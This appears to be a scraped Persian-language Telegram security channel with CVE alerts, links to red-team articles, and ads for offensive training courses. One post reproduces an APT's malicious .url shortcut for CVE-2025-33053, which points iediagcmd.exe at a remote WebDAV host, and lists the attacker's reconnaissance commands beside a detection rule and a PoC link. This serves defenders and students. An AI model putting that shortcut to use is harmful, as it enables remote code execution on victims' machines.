NEW BOT Телеграм, страница

C2 Redirectors: Advanced Infrastructure for Modern Red Team Operations
https://xbz0n.sh/blog/c2-redirectors

C2 Redirectors: Advanced Infrastructure for Modern Red Team Operations

Let's talk about Command and Control (C2) infrastructure. It's the backbone of any red team operation, letting you talk to your implants in target environmen...

❤1

3.34K viewsSoheil, 17:07

SoheilSec

https://bishopfox.com/blog/2025-red-team-tools-c2-frameworks-active-directory-network-exploitation

Bishop Fox

Top Red Team Tools & C2 Frameworks for 2025: Active Directory &…

Explore the top Red Team tools and C2 frameworks for 2025, with expert insights on exploiting Active Directory and network environments.

👍3❤2

3.02K viewsSoheil, 17:03

SoheilSec

با سلام و وقت بخیر،
ضمن عرض تسلیت به مردم ایران
در صورتی که در حوزه SOC فعالیت می کنید حتما آسیب پذیری CVE-2025-33073 را زیر نظر داشته باشید امکان دامپ پسورد با سطح دسترسی یوزر پایین در صورتی که dns بتواند ادد شود و smb signing خاموش باشد.
https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
نمونه لاگ عکسش ضمیمه شد همچنین در صورتی که ادمین سرور هستید می توانید با کامند چک کنید

Get-DnsServerResourceRecord -ZoneName "domain.corp" | Where-Object { $_.HostName -like "*1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA*" }

❤14👌6👍4🤔2🙏2

7.71K viewsSoheil, edited 07:39

SoheilSec

با سلام و وقت بخیر،
یکی از آسیب‌پذیری‌های جدید که اخیراً مورد سوءاستفاده قرار گرفته، آسیب‌پذیری CVE-2025-33053 می‌باشد. این آسیب‌پذیری از طریق استفاده از فایل‌های .url (InternetShortcut) و ابزار داخلی ویندوز iediagcmd.exe، امکان اجرای غیرمستقیم کد را فراهم می‌کند.
به‌طور خاص، مهاجم فایلی با محتوای زیر ایجاد می‌کند:

[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\summerartcamp[.]net@ssl@443/DavWWWRoot\OSYxaOjr
ShowCommand=7
IconIndex=13
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Modified=20F06BA06D07BD014D

ابزار iediagcmd.exe فایل را باز کرده و با توجه به تنظیمات آن، سیستم تلاش می‌کند تا مسیر WorkingDirectory را از طریق WebDAV بارگذاری کند. این رفتار باعث می‌شود تا امکان اجرای کد مخرب از راه دور فراهم شود.

❤14

2.85K viewsSoheil, 05:19

SoheilSec

طبق گزارش Check Point، یک گروه APT با استفاده از این روش بدافزار خود را اجرا کرده و کنترل سیستم را به دست گرفته‌اند. شواهد نشان می‌دهد C2 مورد استفاده یکی از اجنت‌های Mythic بوده و دستورات زیر توسط آن اجرا شده‌اند:

ipconfig.exe /all
netsh.exe in tcp show global
netsh.exe advfirewall firewall show rule name=all verbose
route.exe print

یک رول پایه برای شناسایی url

index=sysmon EventCode=1 
(Image="*iediagcmd.exe" OR CommandLine="*iediagcmd.exe*") 
AND (CommandLine="*@ssl@443*" OR CommandLine="*DavWWWRoot*" OR CommandLine="*summerartcamp*")

و اما poc آسیب پذیری:
https://github.com/DevBuiHieu/CVE-2025-33053-Proof-Of-Concept

GitHub

GitHub - DevBuiHieu/CVE-2025-33053-Proof-Of-Concept: CVE-2025-33053 Proof Of Concept (PoC)

CVE-2025-33053 Proof Of Concept (PoC). Contribute to DevBuiHieu/CVE-2025-33053-Proof-Of-Concept development by creating an account on GitHub.

❤9🗿1

3.99K viewsSoheil, 05:19

SoheilSec

https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot

❤3👍2

3.94K viewsSoheil, 12:07

SoheilSec

Fortinet Fixes Critical SQL Injection Flaw in FortiWeb (CVE-2025-25257, CVSS 9.6)

https://securityonline.info/fortinet-fixes-critical-sql-injection-flaw-in-fortiweb-cve-2025-25257-cvss-9-6/

❤3😈1

4.66K viewsSoheil, 14:10

SoheilSec

RTO.pdf

96.2 KB

دوره RTO
شروع دوره 17 مرداد مدت زمان دوره در 4 جلسه 8 ساعته که کلا 32 ساعت روزهای برگزاری جمعه ها 8 تا 16
دوره به صورت آنلاین می‌باشد. در صورتی که سرفصل تکمیل نشود تایم اضافه خواهد شد.
دوره به صورت عملی با سناریو شبیه سازی APT بر روی LAB شخصی سازی شده می‌باشد.
سرفصل ضمیمه شد هر روز شامل چندین موضوع می‌باشد که همراه با حل تمرین در لب می‌باشد.
قیمت دوره 15 تومن
نمونه تدریس
https://www.youtube.com/@soheilsec/playlists

سوال در مورد دوره @soheilsec

❤23🗿3👌2🤔1🆒1

6.34K viewsSoheil, edited 05:51

SoheilSec

سلام وقت بخیر،
ویدیو معرفی دوره پاسخ به سوال‌هایی که مطرح شد.
https://youtu.be/va9LZ3noBTc
جهت ثبت نام در دوره و سوالی دارید که پاسخ داده نشده @soheilsec

YouTube

دوره ردتیم با sliver c2

توضیحات بیشتر و ثبت نام در دوره
https://news.1rj.ru/str/learnpentest/1087
==========================================
آدرس سایت و شبکه های اجتماعی
https://www.soheilsec.com/
https://twitter.com/soheilsec
https://www.instagram.com/soheilsec/
https://www.linkedin.com/…

❤5👍2😈1🆒1

3.75K viewsSoheil, 19:28

SoheilSec

FULLY OPERATIONAL: STUXNET 15 YEARS LATER AND THE EVOLUTION OF CYBER THREATS TO CRITICAL INFRASTRUCTURE.

https://homeland.house.gov/hearing/fully-operational-stuxnet-15-years-later-and-the-evolution-of-cyber-threats-to-critical-infrastructure/

❤3

2.9K viewsSoheil, 03:08

SoheilSec

Iran CTI Report-War Time.pdf

1.6 MB

🗿4❤2

7.12K viewsSoheil, 05:55

SoheilSec

Forwarded from Try Hack Box

💻 به تیم مدرسان TryHackBox بپیوندید!

تیم TryHackBox در حال گسترش تیم مدرسان خود است و از متخصصان حوزه امنیت سایبری، تست نفوذ، تیم قرمز (Red Team) و تیم دفاعی (Blue Team) دعوت می‌کند تا به ما بپیوندند.

اگر شما تجربه عملی و تخصص در یکی از حوزه‌های امنیت سایبری دارید و علاقه‌مند به انتقال دانش و تجربیات خود به دیگران هستید.

همچنین اگر می‌خواهید در یک جامعه آموزشی پویا و حرفه‌ای فعالیت کنید، ما فرصتی ایده‌آل برای شما داریم

در کنارتان هستیم تا دوره‌های آموزشی خود را طراحی و تدریس کنید و از حمایت تیم ما برای تولید محتوای باکیفیت بهره‌مند شوید.

همچنین درآمدی متناسب با مهارت‌های خود داشته باشید و در رشد جامعه امنیت سایبری نقش مؤثری ایفا کنید.

درصورت تمایل رزومه خود را برای ما ارسال کنید.

Telegram: @TryHackBoxBot
Gmail: TryHackBox@gmail.com

❤3

3.15K viewsSoheil, 09:29

SoheilSec

RTO.pdf

سلام دوستانی که هنوز ثبت نام نکردند تا تاریخ 10 مرداد می‌باشد.

❤3

3.25K viewsSoheil, 03:00

SoheilSec

🗿14😈4❤2🤔2

2.81K viewsSoheil, 07:22

SoheilSec

Extending AD CS attack surface to the cloud with Intune certificates
https://dirkjanm.io/extending-ad-cs-attack-surface-intune-certs/

dirkjanm.io

Extending AD CS attack surface to the cloud with Intune certificates

Active Directory Certificate Services (AD CS) attack surface is pretty well explored in Active Directory itself, with *checks notes* already 16 “ESC” attacks being publicly described. Hybrid certificate attack paths have not gained that much attention yet…

1.96K viewsSoheil, 02:59

SoheilSec

Forwarded from ＳｅｃＮｏｔｅ

┐⁠(⁠´⁠ー⁠｀⁠)⁠┌

https://www.linkedin.com/posts/alireza-hosseini-ab53a7282_%EF%BD%93%EF%BD%85%EF%BD%83-%EF%BD%8E%EF%BD%8F%EF%BD%94%EF%BD%85-activity-7363312135457673217-Pc6k?utm_source=share&utm_medium=member_desktop&rcm=ACoAAETB42kB9nlQcP_FDiEg8Yigl_kGSv6f5hE

ＳｅｃＮｏｔｅ | Alireza Hosseini

مدتی بود روی باج‌افزارها (از نظر سرعت، تکنیک‌ها و روش‌های رمزنگاری) مطالعه می‌کردم. یکی از نکات جالبی که دیدم این بود که تقریباً همه این خانواده‌ها قبل از رمزگذاری، Shadow Copies و بکاپ‌ها رو پاک می‌کنن.

اما یک سؤال برام پیش اومد: برای حذف بکاپ‌ها نیاز…

❤3🗿2

2.26K viewsSoheil, 03:26

SoheilSec

The Hacker's Renaissance: A Manifesto Reborn
https://phrack.org/issues/72/19#article

Phrack

The Hacker's Renaissance - A Manifesto Reborn

Click to read the article on phrack

2.39K viewsSoheil, 12:12

SoheilSec

Active Directory.pdf

47.3 KB

دوره AD for hackers
شروع دوره 20 شهریور مدت زمان دوره 2 جلسه 8 ساعته که 16 ساعت می‌باشد.
روزهای برگزار دوره پنجشنبه‌ها 8 تا 16
دوره به صورت آنلاین می‌باشد.
دوره با محوریت پوشش مفاهیم حملات در اکتیو می‌باشد.
سرفصل ضمیمه شده است.
قیمت دوره 6 تومن

❤10🗿6🤔2

2.37K viewsSoheil, edited 10:32

SoheilSec

Forwarded from ＳｅｃＮｏｔｅ